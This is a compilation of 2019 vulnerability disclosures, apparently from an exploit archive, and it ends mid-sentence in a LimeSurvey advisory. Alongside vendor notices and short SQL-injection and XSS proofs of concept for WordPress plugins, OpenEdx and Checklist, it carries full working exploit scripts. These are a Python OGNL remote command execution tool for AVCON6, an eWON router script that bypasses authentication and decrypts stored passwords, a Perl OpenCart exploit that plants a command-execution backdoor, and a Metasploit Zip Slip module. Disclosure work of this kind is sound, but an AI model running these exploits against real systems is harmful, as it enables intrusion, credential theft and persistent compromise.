-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

CA20190904-01: Security Notice for CA Common Services Distributed
Intelligence Architecture (DIA)

Issued: September 4th, 2019
Last Updated: September 4th, 2019

CA Technologies, A Broadcom Company, is alerting customers to a
potential risk with CA Common Services in the Distributed
Intelligence Architecture (DIA) component. A vulnerability exists,
CVE-2019-13656, that can allow a remote attacker to execute arbitrary
code. CA published solutions to address the vulnerabilities and
recommends that all affected customers implement these solutions
immediately.

Risk Rating

High

Platform(s)

All supported platforms

Affected Products

CA Common Components DIA

CA Technologies products that bundle this software include:
CA Client Automation 14 and later versions
CA Workload Automation AE 11.3.5 and 11.3.6

How to determine if the installation is affected

Customers should review the Solution section to determine whether the
fix is present.

CA Workload Automation Autosys:

The Distributed Intelligence Architecture (DIA) that installs with
the 11.3.5 and 11.3.6 C3 DVD is vulnerable.

Solution

CA published the following solutions to address the vulnerabilities.
Fixes are available on the CA support site.

CA Client Automation:

Windows
Solution: SO09605

Linux
Solution: SO09633

CA Workload Automation Autosys:

The following are the fixes published by the Workload Automation
Autosys Product team for the vulnerability CVE-2019-13656 reported
against Distributed Intelligence Architecture (DIA) shipped with C3
DVD.

Windows
Solution: SO09111

Linux
Solution: SO09057

HP-UX
Solution: SO09086

Solaris
Solution: SO09084

AIX
Solution: SO09085

Patch Validation

The script applypatch.bat for Windows and applypatch.sh for Linux and
Unix platforms when run should not produce any errors in its console
output. The script starts the NSM services at the end of the patch
application process. A successful patch application is manifested in
the form of all services coming up successfully.

References

CVE-2019-13656 - Ca Common Services remote code execution

Acknowledgement

CVE-2019-13656 - Fredrik Ravne, Oslo Boers

Change History

Version 1.0: Initial Release

CA customers may receive product alerts and advisories by subscribing
to Proactive Notifications on the support site.

Customers who require additional information about this notice may
contact CA Technologies Support at https://casupport.broadcom.com/

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at ca.psirt <AT> broadcom.com

Security Notices, PGP key, and disclosure policy and guidance
www.ca.com/us/support/ca-support-online/documents.aspx?id=177782

Kevin Kotas
CA Product Security Incident Response Team

Copyright 2019 Broadcom. All Rights Reserved. The term "Broadcom"
refers to Broadcom Inc. and/or its subsidiaries. Broadcom, the pulse
logo, Connecting everything, CA Technologies and the CA technologies
logo are among the trademarks of Broadcom. All trademarks, trade
names, service marks and logos referenced herein belong to their
respective companies.

-----BEGIN PGP SIGNATURE-----
Charset: utf-8

wsBVAwUBXXK0LLZ6yOO9o8STAQgQBgf/UeZFiw6Ha+eEfAvDIx92DE+gglGuZB20
tc1POyvgJABJGBdyqE1aV+eYoTNhEIagD54Fkl0ZMJnwR2ZrTAdOPV/pOJa/F+z9
ajAv5Oikj2I5SH4MI0Az48ApyyD6y+zQjmu8wc5LH4LfuoujAGOIqF0s6OFMB+hl
B8VDvqJuNvNalEdVFhNxUHfFjxhQaN0H1G9b98Mv9bnZJ/O60+9Kczff9O6m9y7U
Dfaf0pUIqnsYxUVDk2LQ/ydoLji7QtttNXBQHS9zWIjlEkj90ZMleXozYiR6IiaV
NRUpynhlzmJYf9oG0hdLD7WFXStFREf7atL7QDZuL4ar/Zz7+5xEng==
=1Xi9
-----END PGP SIGNATURE-----

# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap
# CVE : 2019-16119

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from
them.

# POC
In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection.  Following is the POC,

1.   http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&

2.    http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&


# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119

# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# CVE : 2019-16117

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.


# POC

1.    In Add Gallery/Images tab 
2.    Edit current image gallery
3.    In Alt/Title or Description text area add XSS payload e.g;
<script>alert(1);</script>

4.    Click Save and preview.
5.    It will show pop-up confirming existence of XSS vulnerability 

# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/models/Galleries.php?old=2135029&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fmodels%2FGalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117


# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# CVE : 2019-16118

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.


# POC

1.    Go to options tab select watermark tab 
2.    Select text as watermark type
3.    Add watermark text as XSS payload e.g;
"'><img src=a onerror='alert(2);'
4.    Click Save.
5.    It will show pop-up confirming existence of XSS vulnerability

# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Options.php?old=2142624&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FOptions.php
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/js/bwg.js?old=2135029&old_path=photo-gallery%2Ftrunk%2Fjs%2Fbwg.js
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Checklist 1.1.5

Checklist is prone to a reflected cross-site scripting vulnerability
because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert(%22R1XS4.COM%22)%3C/script%3E%3C/path%3E

# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution
# Date: 10/09/2018
# Exploit Author: Nassim Asrir
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: N\A
# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
# Thanks to: Otmane Aarab
# Example below:
# python ./rce.py http://server:8080/ id 
# Testing Target: http://server:8080/
# uid=0(root) gid=0(root)
# Vendor: http://www.epross.com/
# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing   
# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.
# I am not responsible for any wrong use.
######################################################################################################

#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload =  'login.action?redirect:'
    payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'
    payload += 'start(),%23b%3d%23a.getInputStream(),'
    payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),'
    payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
    payload += '.read(%23e),%23matt%3d%23context.'
    payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'
    payload += '%23matt.getWriter().println(%23e),%23matt.'
    payload += 'getWriter().flush(),%23matt.getWriter()'
    payload +=  '.close()}'


    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}
        request = urllib2.Request(url+payload, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py http://target/ id")
    else:
        print('[*] Avcon6-Preauh-Remote Command Execution')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] Executed Command: %s\n" % cmd)
  print("[*] Target: %s\n" % url)
        exploit(url, cmd)

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        SlickQuiz
Vendor URL:     https://wordpress.org/plugins/slickquiz/
Type:           Cross-Site Scripting [CWE-79]
Date found:     2019-05-30
Date published: 2019-09-10
CVSSv3 Score:   6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
CVE:            CVE-2019-12517


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
SlickQuiz for Wordpress 1.3.7.1 (latest)


4. INTRODUCTION
===============
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It
uses the SlickQuiz jQuery plugin.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The "save_quiz_score" functionality available to unauthenticated users via the
Wordpress "/wp-admin/admin-ajax.php" endpoint allows unauthenticated users to
submit quiz solutions/answers. If the configuration option "Save user scores"
is enabled (disabled by default), the response is stored in the database and
later shown in the Wordpress backend for all users with at least Subscriber
rights.

However, since the plugin does not properly validate and sanitize the quiz
response, a malicious XSS payload in either the name, the email or the score
parameter like:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0)
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 181
DNT: 1
Connection: close

action=save_quiz_score&json={"name":"Na<script>alert(document.domain)</script>
me","email":"info@local<script>alert(document.domain)</script>host",
"score":"<script>alert(document.domain)</script>","quiz_id":1}

is executed directly within the backend at "/wp-admin/admin.php?page=slickquiz"
across all users with the privileges of at least subscriber and up to admin.


6. RISK
=======
To successfully exploit this vulnerability an authenticated user must be tricked
into visiting the SlickQuiz administrative backend on the affected Wordpress
installation.

The vulnerability can be used to permanently embed arbitrary script code into the
administrative Wordpress backend, which offers a wide range of possible
attacks such as redirecting the user to a malicious page, spoofing content on the
page or attacking the browser and its plugins.


7. SOLUTION
===========
None (Remove the plugin)


8. REPORT TIMELINE
==================
2019-05-30: Discovery of the vulnerability during H1-4420
2019-06-01: CVE requested from MITRE
2019-06-02: MITRE assigns CVE-2019-12517
2019-06-10: Contacted vendor using their publicly listed email address
2019-06-19: Contacted vendor using their publicly listed email address
2019-06-22: Contacted vendor using their publicly listed email address
2019-08-28: No response from vendor.
2019-09-10: Public disclosure.


9. REFERENCES
=============
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        SlickQuiz
Vendor URL:     https://wordpress.org/plugins/slickquiz/
Type:           SQL Injection [CWE-74]
Date found:     2019-05-30
Date published: 2019-09-10
CVSSv3 Score:   8.1 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
CVE:            CVE-2019-12516


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
SlickQuiz for Wordpress 1.3.7.1 (latest)


4. INTRODUCTION
===============
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It
uses the SlickQuiz jQuery plugin.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The SlickQuiz Wordpress plugin is vulnerable to multiple authenticated SQL
Injections whenever the "id" parameter is involved. It is not even required to
have any quiz created, just the pure presence of the plugin makes the
installation vulnerable.

Since all access levels from Subscriber (the lowest possible rights) to Admin
basically have access to the plugin, it is possible to escalate privileges quite easily.

To name just a few vulnerable endpoints:

/wp-admin/admin.php?page=slickquiz-scores&id=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-edit&id=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-preview&id=(select*from(select(sleep(5)))a)


6. RISK
=======
The vulnerability can be used by an authenticated attacker (lowest possible
rights of Subscriber are sufficient) to read sensitive contents from the backend
database and therefore compromise all kinds of information, which is stored in
the database. This could be sensitive authentication information like passwords
or customer and employee information like email addresses and could also be used
to escalate privileges to Admin which in return leads to RCE on the Wordpress
installation via the plugin functionality.


7. SOLUTION
===========
None (Remove the plugin)


8. REPORT TIMELINE
==================
2019-05-30: Discovery of the vulnerability during H1-4420
2019-06-01: CVE requested from MITRE
2019-06-02: MITRE assigns CVE-2019-12516
2019-06-10: Contacted vendor using their publicly listed email address
2019-06-19: Contacted vendor using their publicly listed email address
2019-06-22: Contacted vendor using their publicly listed email address
2019-08-28: No response from vendor
2019-09-10: Public disclosure.


9. REFERENCES
=============
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/

Information
--------------------
Advisory by Netsparker
Name: Multiple Reflected Cross-site Scripting Vulnerabilities in OpenEdx
version Ironwood.1
Affected Software: OpenEdx
Affected Versions: Ironwood.1
Homepage: https://open.edx.org/
Vulnerability: Cross site Scripting
Severity: Medium
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Netsparker Advisory Reference: NS-19-014

Technical Details
--------------------

URL : http://
{DOMAIN}/{PATH-OF-OPENEDX}/support/certificates?course_id=%27%2balert(‘xss’)%2b%27&query=3&user=3
Parameter Name : course_id
Parameter Type : GET
Attack Pattern : %27%2balert(‘xss’)%2b%27

URL:
http://
{DOMAIN}/{PATH-OF-OPENEDX}/support/certificates?course_id=3&query=3&user=%27%2balert(‘xss’)%2b%27
Parameter Name : user
Parameter Type : GET
Attack Pattern : %27%2balert(‘xss’)%2b%27

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-014-reflected-cross-site-scripting-in-openedx/


Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>
<https://www.netsparker.com/blog/events/exhibiting-global-appsec-dc-2019/>

#! /usr/bin/env python
'''
    # Exploit Title: eWON v13.0 Authentication Bypass
    # Date: 2018-10-12
    # Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be
    # Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0
    #                  [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability
    # Vendor Homepage: https://www.ewon.biz
    # Version: eWon Firmware 12.2 to 13.0
    # Tested on: eWon Flexy with Firmware 13.0s0

  Copyright 2019 Photubias(c)

        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.

        File name eWON-Flewy-Pwn.py
        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

        This script will perform retrieval of clear text credentials for an eWON Flexy router
         Tested on the eWON Flexy 201 with Firmware 13.0s0
         Only requires a valid username (default = adm) and 
         this user must have the Rights 'View IO'& 'Change Configuration'

        It combines two vulnerabilities: authentication bypass (fixed in 13.1s0)
          and a weak password encryption, allowing cleartext password retrievel for all users (fixed in 13.3s0)       
'''
username = 'adm'

import urllib2,urllib,base64,binascii,os

def decode(encpass):
    xorString = "6414FE6F4C964746900208FC9B3904963A2F61"
    def convertPass(password):
        if (len(password)/2) > 19:
            print('Error, password can not exceed 19 characters')
            exit()
        return hexxor(password, xorString[:len(password)])
    def hexxor(a, b):
        return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)])
    if encpass.startswith('#_'):
        encpass = encpass.split('_')[2]
    coded = base64.b64decode(encpass)
    codedhex = binascii.hexlify(coded)[:-4]
    clearpass = binascii.unhexlify(convertPass(codedhex))
    print('Decoded password: ' + clearpass)

def getUserData(userid, strIP):
    postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]'
    postwsdlist = postwsdlist.replace('|1','|'+str(userid))
    postdata = {'wsdList' : postwsdlist}
    b64auth = base64.b64encode(username+':').replace('=','')
    result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read()
    resultarr = result.split('","')
    if len(resultarr) == 20:
        fname = str(resultarr[1])
        lname = str(resultarr[2])
        usern = str(resultarr[3])
        if len(usern) == 0:
            return True
        encpassword = resultarr[4]
        print('Decoding pass for user: '+usern+' ('+fname+''+lname+') ')
        decode(encpassword)
        print('---')
        return True
    else:
        return True

strIP = raw_input('Please enter an IP [10.0.0.53]: ')
if strIP == '': strIP = '10.0.0.53'
print('---')

for i in range(20):
    if not getUserData(i, strIP):
        print('### That\'s all folks ;-) ###')
        raw_input()
        exit(0)

raw_input('All Done')

#!/usr/bin/perl -w
#
#  Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#       # [test@localhost opencart]$ perl opencart_rce.pl http://192.168.1.1/oc2302/
#       # [
#  # [ Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
#  # [ ==============================================================
#  # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  # [
#  # [  Disclaimer:
#  # [  This or previous programs are for Educational purpose
#  # [  ONLY. Do not use it without permission. The usual 
#  # [  disclaimer applies, especially the fact that Todor Donev
#  # [  is not liable for any damages caused by direct or 
#  # [  indirect use of the  information or functionality provided
#  # [  by these programs. The author or any Internet provider 
#  # [  bears NO responsibility for content or misuse of these 
#  # [  programs or any derivatives thereof. By using these programs 
#  # [  you accept the fact that any damage (dataloss, system crash, 
#  # [  system compromise, etc.) caused by the use  of these programs
#  # [  are not Todor Donev's responsibility.
#  # [   
#  # [ Use them at your own risk!
#  # [
#  # [ Initializing the browser
#  # [ Authorization..
#  # [ Initializing the payload
#  # [ Uploading the payload
#  # [ Exploiting..
#  # [ Cleaning the temp payload file
#  # [ ==============================================================
#  # uid=48(apache) gid=48(apache) groups=48(apache)
#  # [test@localhost opencart]$ 
#  # 
#
#
#     https://www.owasp.org/index.php/Security_by_Design_Principles
#
# 
use strict;
use JSON;
use HTTP::Request;
use HTTP::Request::Common;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;
$| = 1;
my $host = shift || 'https://localhost/'; # Full path url to the store
my $user = shift || 'admin';
my $pass = shift || 'admin';
my $cmd = shift || 'id';
$cmd =~ s/\|/\;/g;
print "[ 
[ Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
[ ==============================================================
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
[
[  Disclaimer:
[  This or previous programs are for Educational purpose
[  ONLY. Do not use it without permission. The usual 
[  disclaimer applies, especially the fact that Todor Donev
[  is not liable for any damages caused by direct or 
[  indirect use of the  information or functionality provided
[  by these programs. The author or any Internet provider 
[  bears NO responsibility for content or misuse of these 
[  programs or any derivatives thereof. By using these programs 
[  you accept the fact that any damage (dataloss, system crash, 
[  system compromise, etc.) caused by the use  of these programs
[  are not Todor Donev's responsibility.
[   
[ Use them at your own risk!
[
";
print "[ e.g. perl $0 https://target/ <username> <password> <command>\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(90);
   $browser->cookie_jar($jar);
   $browser->agent($user_agent);
my $target = $host."admin/index.php?route=common/login";
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host],"username=$user&password=$pass&redirect=$target");
print "[ Authorization..\n";
# $request->authorization_basic('USERNAME', 'PASSWORD');                                 
my $content = $browser->request($request) or die "Exploit Failed: $!";
print "[ 401 Unauthorized!\n" and exit if ($content->code eq '401');
if (defined ($content->header('Location')) && ($content->header('Location') =~ m/token=(.*)/)){
    my $token = $1;
    my $rce_catch = $host."admin/index.php?route=extension/installer/upload";
    print "[ Initializing the payload\n";
    my $name;
    for (0..18) { $name .= chr( int(rand(25) + 65) ); }
    my $filename = $name.".ocmod.xml";
    undef $name;

my $payload = '<?xml version="1.0" encoding="utf-8"?>
<modification>
<name><![CDATA['.$filename.']]></name>
<code><![CDATA['.$filename.']]></code>
<version>1.337</version>
<author></author>
<link></link>

<file path="catalog/controller/common/header.php">
<operation>
<search><![CDATA[// For page specific css]]></search>
<add position="before"><![CDATA[    if(isset($this->request->post[\'cmd\'])){
      echo "0WNED";
      $cmd = ($this->request->post[\'cmd\']);
      passthru($cmd);
      echo "0WNED";
      $this->db->query("DELETE FROM `" . DB_PREFIX . "modification` WHERE `name` LIKE \''.$filename.'\'");
    }]]></add>
</operation>
</file>
</modification>
';
    open (TEMP, "> $ENV{PWD}/$filename") or die "[ Error: $ENV{PWD}/$filename $!";
    flock (TEMP, 2);
    truncate (TEMP, 0);
    seek (TEMP, 0, 0); 
    print (TEMP $payload);
    close (TEMP);
my $upload_payload = HTTP::Request::Common::POST($rce_catch."&token=".$token, Content_Type => 'form-data', Referer => $target, Content => [ file => ["$ENV{PWD}/$filename"]]);
print "[ Uploading the payload\n";                                        
my $response = $browser->request($upload_payload) or die "[ Exploit Failed: $!";

my $json = JSON->new->pretty;

 my $json_object = $json->decode($response->content);

print ("[ Exploit failed! You do not have permission to upload the payload.\n") and exit if ($json_object->{'error'});

        print "[ Exploiting..\n";

        for my $item( @{$json_object->{step}} ){ 
                my $xml_inst_request = HTTP::Request->new (POST => $item->{url}, [Content_Type => "application/x-www-form-urlencoded", Referer => $host], "path=".$item->{path});
                my $xml_inst_response = $browser->request($xml_inst_request) or die "[ Exploit Failed: $!";
                print "[ Exploit failed.\n" and exit if ($xml_inst_response->code ne '200');
        }
                my $refresh_url = $host."admin/index.php?route=extension/modification/refresh&redir_inst=1&token=$token";
                my $xml_refresh_request = HTTP::Request->new (GET => $refresh_url,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
                $browser->request($xml_refresh_request) or die "[ Exploit Failed: $!";
                my $exploiting = $host."index.php?route=common/home";
                my $exploiting_request = HTTP::Request->new (POST => $exploiting,[Content_Type => "application/x-www-form-urlencoded",Referer => $host],"cmd=$cmd");
                my $command_response = $browser->request($exploiting_request) or die "[ Exploit Failed: $!";
                print "[ Cleaning the temp payload file\n";
                unlink("$ENV{PWD}/$filename") or die "[ Error: $ENV{PWD}/$filename $!";
                        if (($command_response->as_string() =~ m/0WNED(.*?)0WNED/gs) ne ''){
                                print "[ ==============================================================\n";
                                print $1;
                        } else {
                                print "[ ==============================================================\n";
                                print "[ Exploit failed: $cmd: command not found or isn't correct.\n";
                        }
                $browser->request($xml_refresh_request) or die "[ Exploit Failed: $!";
                exit; 

} else { 
        print "[ Exploit failed! You are not authorized. Wrong Username/Password.\n";
        exit;
}

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
'Name'           => "Generic Zip Slip Traversal Vulnerability",
'Description'    => %q{
        This is a generic arbitrary file overwrite technique, which typically results in remote
        command execution. This targets a simple yet widespread vulnerability that has been
        seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.
        The idea is that often archive extraction libraries have no mitigations against
        directory traversal attacks. If an application uses it, there is a risk when opening an
        archive that is maliciously modified, and result in the embedded payload to be written
        to an arbitrary location (such as a web root), and result in remote code execution.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Snyk',  # Technique discovery
'sinn3r' # Metasploit
        ],
'References'     =>
        [
          ['URL', 'https://snyk.io/research/zip-slip-vulnerability']
        ],
'DefaultOptions'  =>
        {
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => true
        },
'Platform'       => ['linux', 'win', 'unix'],
'Targets'        =>
        [
          ['Manually determined', {}]
        ],
'Privileged'     => false,
'DisclosureDate' => "Jun 05 2018"
    ))

    register_options([
      OptString.new('FILENAME', [true, 'The tar file (tar)', 'msf.tar']),
      OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
    ])
  end

  class ZipSlipArchive
    attr_reader :data
    attr_reader :fname
    attr_reader :payload

    def initialize(n, p)
      @fname = n
      @payload = p
      @data = make
    end

    def make
      data = ''
      path = Rex::FileUtils.normalize_unix_path(fname)
      tar = StringIO.new
      Rex::Tar::Writer.new(tar) do |t|
        t.add_file(path, 0777) do |f|
          f.write(payload)
        end
      end
      tar.seek(0)
      data = tar.read
      tar.close
      data
    end
  end

  def make_tar(target_payload_path)
    elf = generate_payload_exe(code: payload.encoded)
    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe)
    archive.make
  end

  def exploit
    target_payload_path = datastore['TARGETPAYLOADPATH']
    unless target_payload_path.match(/\.\.\//)
      print_error('Please set a traversal path')
      return
    end

    tar = make_tar(target_payload_path)
    file_create(tar)
    print_status('When extracted, the payload is expected to extract to:')
    print_status(target_payload_path)
  end
end

=begin
A quick test:

$ python
>>> import tarfile
>>> t = tarfile.open('test.tar')
>>> t.extractall()
>>> exit()

=end

SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
=======================================================================
              title: Stored and reflected XSS vulnerabilities
            product: LimeSurvey
 vulnerable version: <= 3.17.13
      fixed version: =>3.17.14
         CVE number: CVE-2019-16172, CVE-2019-16173
             impact: medium
           homepage: https://www.limesurvey.org/
              found: 2019-08-23
                 by: Andreas Kolbeck (Office Munich)
                     David Haintz (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"LimeSurvey is the tool to use for your online surveys. Whether you are
conducting simple questionnaires with just a couple of questions or advanced
assessments with conditionals and quota management, LimeSurvey has got you
covered. LimeSurvey is 100% open source and will always be transparently developed.
We can help you reach your goals."

Source: https://www.limesurvey.org/


Business recommendation:
------------------------
LimeSurvey suffered from a vulnerability due to improper input
and output validation. By exploiting this vulnerability an attacker could:
    1. Attack other users of the web application with JavaScript code,
       browser exploits or Trojan horses, or
